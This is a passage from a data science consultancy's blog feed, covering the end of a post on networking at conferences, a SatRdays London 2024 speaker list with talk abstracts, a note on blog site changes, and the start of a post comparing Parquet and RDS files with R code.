&lt;h2 id="okay-gotcha-plan-the-sessions-to-attend-in-advance-while-im-doing-that-are-there-any-useful-sessions-i-should-consider"&gt;Okay, gotcha. Plan the sessions to attend in advance. While I&amp;rsquo;m doing that, are there any useful sessions I should consider?&lt;/h2&gt;
&lt;p&gt;Some conferences have specific networking sessions for people that already have things in common like the &amp;ldquo;Birds of a Feather&amp;rdquo; sessions at &lt;em&gt;Posit Conference&lt;/em&gt;. These are short, one-off meetups for people who have something in common, e.g. R educators, people working with R in insurance, R-Ladies or R users from Africa. These groups are often smaller and you already have something in common, making networking a little less daunting and the connections a little more relevant.&lt;/p&gt;
&lt;h2 id="right-ive-been-through-the-whole-schedule-i-think-ive-picked-something-for-each-session-now-and-wow-im-going-to-be-busy"&gt;Right, I&amp;rsquo;ve been through the whole schedule. I think I&amp;rsquo;ve picked something for each session now, and wow, I&amp;rsquo;m going to be busy!&lt;/h2&gt;
&lt;p&gt;Great! Just remember that you don&amp;rsquo;t have to go to every session and social event. It&amp;rsquo;s totally okay to skip a session and recharge. Conferences can be exhausting, even I need a quiet minute to myself sometimes. Grab yourself a cup of tea and find a quiet corner to have a little break from the stimulus. Or head back to your hotel room for an afternoon nap. Then you&amp;rsquo;ll be refreshed for the next session. (Just remember to set an alarm&amp;hellip; ⏰)&lt;/p&gt;
&lt;h2 id="well-thank-you-for-the-advice-im-not-sure-i-can-think-of-any-more-questions"&gt;Well thank you for the advice. I&amp;rsquo;m not sure I can think of any more questions.&lt;/h2&gt;
&lt;p&gt;Well on the topic of questions, I have one last tip.
If you enjoyed someone&amp;rsquo;s talk, but don&amp;rsquo;t want to ask a question in the session, you can go and talk to them in the coffee break following their talk. From the speaker&amp;rsquo;s perspective, it&amp;rsquo;s nice to chat with people who got value from your talk, and you&amp;rsquo;ll have another friendly face in the lunch queue.&lt;/p&gt;
&lt;h2 id="do-you-have-any-suggestions-for-good-conferences-to-go-to"&gt;Do you have any suggestions for good conferences to go to?&lt;/h2&gt;
&lt;p&gt;How about &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/" rel="external"&gt;North East Data Scientists Meetup&lt;/a&gt;, &lt;a href="https://www.meetup.com/leeds-data-science-meetup/" rel="external"&gt;Leeds Data Science Meetup&lt;/a&gt; or &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;AI in Production&lt;/a&gt; in June 2026?
You can register to attend by visiting those websites.
They&amp;rsquo;re being organised by &lt;a href="https://jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="ill-take-a-look-thanks"&gt;I&amp;rsquo;ll take a look, thanks.&lt;/h2&gt;
&lt;p&gt;And hey, if I see you there, you&amp;rsquo;ll have an extroverted friend who can introduce to you &lt;em&gt;everyone&lt;/em&gt; at the conference.&lt;/p&gt;
&lt;h2 id="oh-no-"&gt;oh no 😰&lt;/h2&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/an-introverts-guide-to-networking-at-a-conference/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2024: Speakers</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2024-speakers/</link><pubDate>Tue, 27 Feb 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2024-speakers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-speakers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2024-speakers/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h3 a:after { content: unset; }
main h3 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;SatRdays London is fast approaching and we are happy to announce our full lineup of speakers for the event! Read on for more info. If you want to join in the fun, head over to the &lt;a href="https://satrdays-london-2024.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt; to sign up!&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ll be at the amazing &lt;a href="https://en.wikipedia.org/wiki/Bush_House" rel="external"&gt;Bush House&lt;/a&gt;, courtesy of &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt; on 27th April 2024!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-satrdays-speaker"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="andrie-de-vries---posit"&gt;&lt;a href="https://www.linkedin.com/in/andriedevries/" rel="external"&gt;Andrie de Vries&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; &lt;img src="images/andrie@2x.jpg" alt="Photo of Andrie de Vries" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="applying-product-management-in-data-science"&gt;Applying product management in data science&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;Andrie is Director of Product Strategy at Posit (formerly RStudio) where he works on the Posit
commercial products. He started using R in 2009 for market research statistics, and later joined
Revolution Analytics and then Microsoft, where he helped customers implement advanced analytics
and machine learning workflows. To keep healthy, he practices yoga and does some recreational
running and canoeing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="hannah-frick---posit"&gt;&lt;a href="https://www.linkedin.com/in/hannah-frick" rel="external"&gt;Hannah Frick&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; &lt;img src="images/hannah@2x.jpg" alt="Photo of Hannah Frick" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="survival-analysis-is-coming-to-tidymodels"&gt;Survival analysis is coming to tidymodels&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;If you have time-to-event data, such as data on customer churn, data on the lifetime of machines, or similar, survival analysis with its censored regression models gives you the ability to include all your observations in the model appropriately, including those where you may not have observed the event yet.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The tidymodels framework is a collection of packages for safe, performant, and expressive supervised predictive modeling on tabular data. The framework&amp;rsquo;s consistency makes switching between models easy, its guardrails against common pitfalls such as overfitting due to data leakage make it safe. It covers the entire modeling workflow: preprocessing and feature engineering, models, resamples, performance metrics, and tuning.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;We are now extending support for survival analysis across the entire tidymodels framework with dedicated models and metrics, allowing the same ease and expressiveness as for classification and regression, across all steps of the modeling process.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="charlie-gao---hibiki-ai-limited"&gt;&lt;a href="https://shikokuchuo.net/" rel="external"&gt;Charlie Gao&lt;/a&gt; - &lt;a href="https://hibiki-ai.com/" rel="external"&gt;Hibiki AI Limited&lt;/a&gt; &lt;img src="images/charlie@2x.jpg" alt="Photo of Charlie Gao" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="mirai-for-shiny-and-plumber-applications"&gt;mirai’ for Shiny and Plumber Applications&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;‘mirai’ is Japanese for ‘future’. Some of the existing solutions for parallelization in R have not fundamentally changed in 20 years. The technologies behind ‘mirai’ are, in contrast, modern and minimalist, and provide a level of performance that will be noticeable for demanding, client-facing workloads typical of Shiny and Plumber applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;As a scheduler for distributed tasks, ‘mirai’ currently powers the high performance computing needs for the ‘targets’ reproducible-workflow ecosystem, whether locally, on traditional HPC clusters or the cloud. It has undergone the validation required to reliably handle demanding scientific workloads such as clinical trials simulations. At R Project Sprint 2023, it was integrated as a backend for the base R ‘parallel’ package at the request of R-Core.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The same industrial-strength, yet incredibly lightweight solution is now available to power large-scale Shiny and Plumber applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;This presentation demonstrates how ‘mirai’ works in typical example situations which benefit from parallelization of computations, and the different ways they may be distributed to background processes on the same machine or across a network of servers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;A particular highlight will be the zero-configuration TLS option. This ‘just works’ to protect remote connections using single-use certificates generated on-the-fly. This was developed under an R Consortium infrastructure grant that aims to make such technologies available to the wider R community.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="michael-hogers---npl-markets-ltd"&gt;&lt;a href="https://www.linkedin.com/in/michaelhogers" rel="external"&gt;Michael Hogers&lt;/a&gt; - &lt;a href="https://nplmarkets.com/" rel="external"&gt;NPL Markets Ltd&lt;/a&gt; &lt;img src="images/michael@2x.jpg" alt="Photo of Michael Hogers" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="modular-shinyproxy---a-saas-setup"&gt;Modular Shiny(Proxy) - a SaaS setup&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;I aim to provide a talk that displays how one can use R, Shiny and ShinyProxy (or other deployment methods) to create a modular SaaS platform that later allows to swap out modules of the platform with new languages or frameworks. The key ingredients are: use a database back-end across Shiny modules, deploy modules as relatively small apps to dedicated URL endpoints, use a shared UI library across Shiny modules and package your Shiny apps (+ use CI/CD) while keeping business logic separated to later on export business logic functions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="matthew-lam--matthew-law---mott-macdonald"&gt;&lt;a href="https://www.linkedin.com/in/matthewgarethlam/" rel="external"&gt;Matthew Lam&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/matthewjlaw/" rel="external"&gt;Matthew Law&lt;/a&gt; - &lt;a href="https://www.mottmac.com/" rel="external"&gt;Mott MacDonald&lt;/a&gt;&lt;/h3&gt;
&lt;div&gt;&lt;img src="images/matthew-lam@2x.jpg" alt="Photo of Matthew Lam" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt; &lt;img src="images/matthew-law@2x.jpg" alt="Photo of Matthew Law" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt; &lt;/div&gt;
&lt;h4 id="how-mott-macdonald-unlocks-the-power-of-geospatial-data-with-r"&gt;How Mott MacDonald unlocks the power of geospatial data with R&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;Mott MacDonald is a global engineering, management, and development consultancy with a broad portfolio of projects across various engineering disciplines. Geospatial data plays an instrumental role in supporting projects in these sectors, enabling us to understand the world around us so that we can make better informed decisions, improve efficiencies, and drive digital innovation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;In this presentation, we will illustrate how we use R at Mott MacDonald to harness the power of geospatial data with two examples – Risk Modelling for Ash Dieback and Creative Geospatial Visualisation for Impactful Communication.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The Ash Dieback Pipeline is a computer vision project which attempts to identify trees with the Ash Dieback disease from video footage of roadways around the UK. We intend to showcase how we use R to process a variety of geospatial datasets and attempt to model the risk to road users associated with a diseased tree remaining untreated.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Our work at Mott MacDonald often involves wrangling complex datasets to answer multifaceted questions. R provides excellent toolkits for integrating, analysing, and visualising geospatial datasets. We intend to demonstrate how R can be used for creative visualisation of geospatial data to extract and communicate actionable insights.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Through these examples, we hope to outline our team’s maturity journey towards building multilingual spatial data science capabilities alongside traditional GIS platforms.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="myles-mitchell---jumping-rivers"&gt;&lt;a href="https://uk.linkedin.com/in/myles-mitchell-4009aa98" rel="external"&gt;Myles Mitchell&lt;/a&gt; - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt; &lt;img src="images/myles@2x.jpg" alt="Photo of Myles Mitchell" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="using-r-to-teach-r"&gt;Using R to teach R&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;At Jumping Rivers, we teach over forty courses covering data science topics, including programming, data visualisation and machine learning, in R as well as Python, Tableau, Git, Docker and Stan. Most courses follow the same template: static notes, live coding scripts and presentation slides. For every taught course we also have to spin up a bespoke virtual environment, collect feedback and generate certificates.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;In this talk, I will explain how we have used R to streamline the course writing process, automate the course build and deployment to Posit Workbench, and conduct post-course administrative tasks. With over 100 courses taught every year, each step in this pipeline must be rigorously tested so that, on the day, the trainer can focus on the attendees without having to worry about technical issues.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;I will draw on our process&amp;rsquo;s successes (and shortcomings) and share some take-home lessons applicable to any big coding project, including packaging of source code, automated testing and scheduled builds.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="nicola-rennie---lancaster-university"&gt;&lt;a href="https://www.linkedin.com/in/nicola-rennie/" rel="external"&gt;Nicola Rennie&lt;/a&gt; - &lt;a href="https://www.lancaster.ac.uk/health-and-medicine/research/statistics/" rel="external"&gt;Lancaster University&lt;/a&gt; &lt;img src="images/nicola@2x.jpg" alt="Photo of Nicola Rennie" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="typst-or-latex-styling-pdf-documents-with-quarto-extensions"&gt;Typst or LaTeX? Styling PDF documents with Quarto extensions&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;Quarto is an open-source scientific and technical publishing system that allows you to combine text with code to create fully reproducible documents in a variety of formats. The addition of custom styling to documents can make them look more professional and recognisable. In this talk, I&amp;rsquo;ll give an overview of ways to create customised PDF documents using Quarto. Until recently, this meant getting to grips with LaTeX. Now, there&amp;rsquo;s a new kid on the block: Typst. Typst is an open-source typesetting system that is designed to be as powerful as LaTeX while being much easier to learn and use.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Extensions are a powerful way to modify and extend the behaviour of Quarto, including adding styling to your documents with LaTeX or Typst. To demonstrate the differences between LaTeX and Typst, I’ll walk through the process of converting a LaTeX-based style extension to Typst, allowing users to easily switch between them. We’ll compare the two – discussing error messages (we all get them!), render time, and customisability along the way.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="matt-thomas---british-red-cross"&gt;&lt;a href="https://www.linkedin.com/in/matthewgthomas/" rel="external"&gt;Matt Thomas&lt;/a&gt; - &lt;a href="https://www.redcross.org.uk/" rel="external"&gt;British Red Cross&lt;/a&gt; &lt;img src="images/matt@2x.jpg" alt="Photo of Matt Thomas" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="where-data-meets-disaster-a-journey-through-the-british-red-crosss-humaniverse"&gt;Where data meets disaster: A journey through the British Red Cross’s &amp;lsquo;humaniverse&amp;rsquo;&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;The ‘Humaniverse’ is a suite of R packages produced by the British Red Cross’s data scientists for sharing humanitarian data and tools. Open data and analyses are vital for 21st Century humanitarianism and these packages have transformed the speed and scale at which we can provide answers about emerging and ongoing humanitarian crises in the UK. In this talk, I will offer an overview of the Humaniverse and will share some of the ways we have used this infrastructure to inform how the British Red Cross supports people affected by disasters, displacement, and health crises. I will cover our core R packages, discuss how and why we work in the open, demonstrate some of the analyses and apps we’ve built using this infrastructure, and share our ambitions for the future of the Humaniverse.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-speakers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>A Blog Post About the Blog</title><link>https://www.jumpingrivers.com/blog/blog-post-about-the-blog/</link><pubDate>Thu, 15 Feb 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/blog-post-about-the-blog/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/blog-post-about-the-blog/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/blog-post-about-the-blog/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main .blog-content img {
display: block;
width: 500px;
max-width: 100%;
margin: 0 auto;
border: 1px solid #888
}
&lt;/style&gt;
&lt;p&gt;If you&amp;rsquo;re a regular visitor to our blog you may have noticed some recent changes we hope will make it easier to find what you&amp;rsquo;re looking for (or interesting stuff you weren&amp;rsquo;t).&lt;/p&gt;
&lt;p&gt;The blog &amp;ldquo;home&amp;rdquo; page, &amp;ldquo;/blog&amp;rdquo; now shows a card for every post with title, author, excerpt, tags and image. (But don&amp;rsquo;t worry, we won&amp;rsquo;t clog your browser up by trying to force every image to load at once.) This new layout means no more hunting backwards and forwards through pages to find what you&amp;rsquo;re looking for. Moreover, the new search bar can help you find things with a couple of taps on the keyboard. The URL is updated when you finish a search so you can easily share the results with others. For example, here are &lt;a href="https://www.jumpingrivers.com/blog/?search=shiny+in+production" rel="external"&gt;all cards that mention Shiny in Production&lt;/a&gt;.&lt;/p&gt;
&lt;img src="assets/search-bar.jpg" srcset="assets/search-bar@2x.jpg 2x" alt="Screenshot showing the blog listings page with 'Shiny in Production' typed in the search bar and the URL updated accordingly."/&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for the next installment of our Shiny in Production conference! For more details, check out our
&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;The tags pages have also been updated in a similar fashion, with the addition of a search bar if there are more than five results listed.&lt;/p&gt;
&lt;img src="assets/tag-search.jpg" srcset="assets/tag-search@2x.jpg 2x" alt="Screenshot of the Tidyverse Tag page. 'ggplot' has been searched for."/&gt;
&lt;p&gt;And, finally, we&amp;rsquo;ve added brand-new author pages so you can quickly find all blog posts written (or co-written) by any of our team here at Jumping Rivers.&lt;/p&gt;
&lt;img src="assets/author-page.jpg" srcset="assets/author-page@2x.jpg 2x" alt="Pair of screenshots showing the author listing from the blog sidebar and the top of one of the author pages."/&gt;
&lt;p&gt;Feel free to tell us what you think via the usual social media channels and let us know if there&amp;rsquo;s something you think we&amp;rsquo;re missing.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/blog-post-about-the-blog/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Parquet vs the RDS Format</title><link>https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/</link><pubDate>Thu, 01 Feb 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part of a series of related posts on Apache Arrow. Other posts
in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/" rel="external"&gt;Understanding the Parquet file
format&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/" rel="external"&gt;Reading and Writing Data with
{arrow}&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Parquet vs the RDS Format (This post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The benefit of using the {arrow} package with parquet files, is it
enables you to work with ridiculously large data sets from the comfort
of an R session. Using the NYC-Taxi data from the &lt;a href="https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/" rel="external"&gt;previous blog
post&lt;/a&gt;
we can perform standard data science operations, such as,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nyc_taxi &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(nyc_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nyc_taxi &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2019&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(month) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(trip_distance &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(trip_distance)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;collect&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;with a speed that seems almost magical. When your dataset is as large as
the NYC-Taxi data, then standard file formats, such as, CSV files and R
binary files, simply aren’t an option.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-arrow-rds-parquet-comparison"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;However, let’s suppose you are in the situation where your data is
inconvenient - not big, just a bit annoying. For example, if we take a
single year and a single month&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;taxi_subset &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(nyc_data) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2019&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; month &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;collect&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The data is still large, with around eight million rows&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;nrow&lt;/span&gt;(taxi_subset)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and takes around 1.2GB of RAM when we load it into R. The data isn’t
big, just annoying! In this situation, should we use the native binary
format or stick with parquet?&lt;/p&gt;
&lt;p&gt;In theory, we could use CSV, but that’s really slow!&lt;/p&gt;
&lt;h3 id="rds-vs-parquet"&gt;RDS vs Parquet&lt;/h3&gt;
&lt;p&gt;The RDS format is a binary file format, native to R. It has been part of
R for many years, and provides a convenient method for saving R objects,
including data sets.&lt;/p&gt;
&lt;p&gt;The obvious question is which file format should you use for storing
tabular data? RDS or parquet? For this comparison, I’m interested in the
following characteristics:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the time required to save the file;&lt;/li&gt;
&lt;li&gt;the file size;&lt;/li&gt;
&lt;li&gt;the time required to load the file.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I’m also a firm believer of keeping things stable and simple. So if both
methods are roughly the same or even if parquet is little better, then I
would stick with R’s binary format. Consequently, I don’t really care
about a few MBs or seconds.&lt;/p&gt;
&lt;h4 id="reading-and-writing-the-data"&gt;Reading and writing the data&lt;/h4&gt;
&lt;p&gt;To save the taxi data subset, we use &lt;code&gt;saveRDS()&lt;/code&gt; for the rds format and
&lt;code&gt;write_parquet()&lt;/code&gt; for the parquet format. The default compression method
used by RDS is &lt;a href="https://en.wikipedia.org/wiki/Gzip" rel="external"&gt;&lt;code&gt;gzip&lt;/code&gt;&lt;/a&gt;, whereas the
parquet uses
&lt;a href="https://en.wikipedia.org/wiki/Snappy_%5C%28compression%5C%29" rel="external"&gt;&lt;code&gt;snappy&lt;/code&gt;&lt;/a&gt;. As you
might guess, the &lt;code&gt;gzip&lt;/code&gt; method produces smaller files, but takes longer.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;saveRDS&lt;/span&gt;(taxi_subset, file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;taxi.rds&amp;#34;&lt;/span&gt;)
